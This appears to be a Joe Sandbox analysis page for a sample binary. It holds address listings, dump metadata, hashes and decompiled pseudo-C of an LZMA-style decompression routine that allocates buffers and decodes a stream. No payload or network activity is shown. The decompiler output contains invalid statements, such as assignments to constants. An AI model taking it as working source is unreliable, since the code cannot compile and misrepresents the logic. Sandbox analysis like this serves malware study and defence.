0x004068bd
0x004068c0
0x004068c3
0x004068c3
0x004068c6
0x004068c6
0x004068c9
0x004068d0
0x004068a4
0x004068a4
0x004068a4
0x004068a4
0x00000000
0x004068d2
0x00000000
0x004068d2
0x004068d0
0x00406856
0x00406859
0x0040685b
0x0040685e
0x00000000
0x00000000
0x004065bd
0x004065bd
0x004065c1
0x00406c06
0x00000000
0x00406c06
0x004065c7
0x004065ca
0x004065cd
0x004065d0
0x004065d3
0x004065d6
0x004065d9
0x004065db
0x004065de
0x004065e1
0x004065e4
0x004065e6
0x004065e6
0x004065e6
0x00000000
0x00000000
0x00406748
0x00406748
0x0040674c
0x00406c12
0x00000000
0x00406c12
0x00406752
0x00406755
0x00406758
0x0040675b
0x0040675d
0x0040675d
0x0040675d
0x00406760
0x00406763
0x00406766
0x00406769
0x0040676c
0x0040676f
0x00406770
0x00406772
0x00406772
0x00406772
0x00406775
0x00406778
0x0040677b
0x0040677e
0x0040677e
0x0040677e
0x00406781
0x00406783
0x00406783
0x00000000
0x00000000
0x004069c5
0x004069c5
0x004069c5
0x004069c9
0x00000000
0x00000000
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069da
0x004069da
0x004069da
0x004069dd
0x004069e0
0x004069e3
0x004069e6
0x004069e9
0x004069ec
0x004069ed
0x004069ef
0x004069ef
0x004069ef
0x004069f2
0x004069f5
0x004069f8
0x004069fb
0x004069fe
0x00406a02
0x00406a04
0x00406a07
0x00000000
0x00406a09
0x00406786
0x00406786
0x00000000
0x00406786
0x00406a07
0x00406c3c
0x00406c5e
0x00406c64
0x00406c66
0x00406c6d
0x00000000
0x00000000
0x0040626b
0x00406c73
0x00406c73
0x00000000

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb0edee23d19deac1726975482a050d35c8d55cbf751c77437a4dc48d9993894
Instruction ID: c4ca8007512b23060288c3a07ef56c74f98c2b045f14e16d7723a10f952c229c
Opcode Fuzzy Hash: fb0edee23d19deac1726975482a050d35c8d55cbf751c77437a4dc48d9993894
Instruction Fuzzy Hash: FC817871D04228CBEF24CFA8C844BADBBB1FB45305F11816AD85ABB2C0C7785A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406677 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406677() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406C7B))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4)); // executed
												}
												_t543 = GlobalAlloc("true", 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc("true",  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
